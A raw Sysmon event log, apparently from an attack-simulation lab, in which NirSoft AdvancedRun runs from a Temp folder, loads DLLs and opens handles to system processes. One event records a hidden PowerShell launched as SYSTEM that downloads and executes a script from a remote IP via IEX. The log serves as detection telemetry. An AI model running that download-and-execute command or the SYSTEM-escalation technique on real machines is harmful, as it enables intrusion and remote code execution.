20:16:32.626{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.626{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077758Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.626{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.623{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077756Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.622{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.622{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.621{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.621{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.621{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004077751Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.619{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.618{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004077749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.615{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004077225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.224{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004077218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.219{834264DD-148F-61EB-8D08-000000002702}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))""C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004077217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.217{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.217{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.215{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-148F-61EB-8B08-000000002702}1504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 